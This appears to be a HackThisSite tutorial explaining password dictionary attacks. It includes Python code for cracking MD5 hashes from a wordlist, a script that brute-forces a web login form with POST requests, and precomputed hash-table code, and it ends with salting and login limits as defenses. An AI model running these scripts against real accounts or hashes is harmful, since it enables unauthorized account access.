"No exceptional circumstances whatsoever, whether a state of war or a threat of war, internal political instability, or any other public emergency, may be invoked as a justification of torture." -- U.N. Convention Against Torture
Preface: I use code to illustrate a lot of concepts in the article, so to really get the most out of it you need to be able to read code. Most of the code will be in python, but you don't necessarily need to know python. As long as you know some programming language you should still be able to understand how the code works. Feel free to use the code provided in this article just do not claim it as your own.
If your reading this than you should know how passwords are hashed, rather than stored in plain text for security purposes. If not then here is a quick explanation. When you hash some text it will go through an algorithm that changes it into a hash, something like this: 49f68a5c8493ec2c0bf489821c21fc3b.
Hashing is a one way thing, so you can not unhash something. Instead hashes are compared. When you create an account on a website the password you enter is hashed and stored somewhere like a database. Then when you login into something, like your hts account, the password you enter is hashed and then compared to password hash associated with your user name. The code might look something like this.
CODE :
$passwd = md5($_POST['passwd']);
if ($uname == $username and $passwd == $password) {
So, you've got some hashes and are ready to get cracking. Well you have two main options, a dictionary attack and a bruteforce attack. In this article I'll be explaining a dictionary attack and show you it's inner workings with some code. Basically in a dictionary attack you have a program read each word from a dictionary(also known as wordlist or password list) and them hash it and compare it to the one you are trying to crack. A dictionary or wordlist is just a massive text file full of potential passwords. Now let me go more in depth with some code. In this example I will use the MD5 hashing algorithm, but the hashing algorithm may be changed to something else like SHA256, depending on what kind of hashes you have.
First of all you will need to import a hash library or code your own hashing functions.
CODE :
import hashlib
Then open your wordlist and read it into a variable.
CODE :
#ask the user what wordlist they would like to use.
wlist = raw_input('wordlist: ')
#opens Dictionary/wordlist.
file = open(wlist,'r')
#reads the wordlist file into a variable
wlst = file.read()
#file is closed
file.close()
#Seperates each word and places it in a list.
dictionary = wlst.split()
Now we loop through each word in our dictionary and compare it to the input hash.
CODE :
while (x<len(dictionary)):
#hashs each dictionary value
hsh = hashlib.md5(dictionary[x])
#compares hashed values
if (hsh.hexdigest()==npt):
print 'hash: ' + dictionary[x]
#if the hashes match then the word is printed.
break
x += 1
The same technique can be applied to other things as well like a login page by sending POST requests for every dictionary word as the password. Then checking for an incorrect password message in the html source code. If an incorrect password message is not returned by one of the passwords then it must have been correct. Most modern sites will be protected against this, but it illustrates the concept of how to apply dictionary attacks to something besides hash cracking. This attack does not target the hash itself but rather it, rapidly guesses passwords at the login page. Here is what some of the code may look like.
CODE :
while (x <= len(dictionary)):
post_data = urllib.urlencode([(POST_acc,user),(POST_pass,dictionary[x])])
req = urllib2.Request(url, post_data)
req.add_header("Content-type", "application/x-www-form-urlencoded")
page = urllib2.urlopen(req)
html = page.read()
page.close()
html_array = html.split()
length = len(html_array) - 1
y = 0
while (y <= length and c==True):
if fail not in html:
print 'passwd: '+dictionary[x]
break
y+=1
x+=1
Now there is one small issue with the hash cracking method that was described above. When dealing with massive wordlists time may be more of a factor. The above method is a bit inefficient due to the fact that it hashes every single word from the dictionary every time it is run. Solution, hash all of the words in a dictionary and write them into a text file along with there unhashed version. Now you can just read the hashes out of your text file and compare them without having to worry about hashing each one every time the program is run. The easiest way to create our hash file is with a python script.
CODE :
while (x<len(dictionary)):
hsh = hashlib.md5(dictionary[x])
hsh_value = hsh.hexdigest()
output_file.write(dictionary[x] + ' ' + hsh_value + '\n')
x += 1
output_file.close()
After running this script on a wordlist:
0racl3
0racl38
0racl38i
The output file will look like this:
0racl3 653cc577a829c9eb982fc75e9edc0f35
0racl38 f31f2dfd5b29ff0d22a89d0af77b80ac
0racl38i 6a12e06016de1b3eecd895e803bb8308
Another thing to consider while trying to improve the speed of our program is that python is interpreted, so it is not as fast as a compiled language like C. Generally you will not notice a difference in speed, but sometimes when you are working with really huge dictionaries it could become an issue. So lets write our code in C++ to further improve performance.
CODE :
ifstream list("hashes.txt");
string data1, data2 = "1";
#Read each word from the list placing the unhashed word in the #data1 variable and the corresponding hash value into data2
while(list >> data1 >> data2){
if(data2 == target_hash){
cout << data1 << " " << data2 << endl;
}
}
list.close();
return 0;
}
Dictionary attacks can be prevented with the use of salt. Salting passwords refers to adding some extra random data to an entered password before it is hashed. Cracking a hash that has been salted not only requires guessing the password itself but also the salt. So you would have to loop through every possible salt for each of your dictionary words. Needless to say it would make a dictionary or brute force attack take so long(years) it would be impractical.
Conclusion: After reading this you should now have an understanding of how hashing and dictionary attacks work. Based on these concepts and the code provided above you should now be able to code your own custom dictionary attacks. There are plenty of tools out there to use for these kinds of attacks, but in certain situations you may need to code your own to accomplish a specific goal. Learning how these attacks work should also help you to write more secure coding practices like salting your passwords and limiting the attempts allowed for a user to login.
-0phidian
Cast your vote on this article 10 - Highest, 1 - Lowest
Comments: Published: 2 comments.
HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.
